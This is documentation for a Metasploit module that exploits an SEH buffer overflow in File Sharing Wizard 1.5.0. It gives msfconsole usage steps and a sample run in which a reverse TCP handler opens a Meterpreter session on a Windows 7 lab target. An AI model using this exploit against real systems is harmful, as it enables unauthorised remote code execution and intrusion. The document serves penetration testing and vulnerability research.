## Description This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter. ## Vulnerable Application This module has been tested successfully on: * Windows 7 x86 SP1 The application installer is linked below [File Sharing Wizard Installer](https://www.exploit-db.com/apps/da3a3626f99a85f9ab59ab77f083ff80-fs-wizard-setup.exe) Once installed run the application and click "Start" to enable the server. ## Verification Steps 1. Start `msfconsole` 2. Do: `use exploits/windows/http/file_sharing_wizard_seh` 3. Do: `set rhosts [IP]` 4. Do: `run` 5. Your payload should get executed ## Scenarios ``` msf5 > use exploit/windows/http/file_sharing_wizard_seh msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 exploit(windows/http/file_sharing_wizard_seh) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.101:80 - Connecting to target [*] 192.168.56.101:80 - Sending payload to target [*] Sending stage (180291 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100 meterpreter > sysinfo Computer : TARGET OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x86 System Language : en_GB Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > ```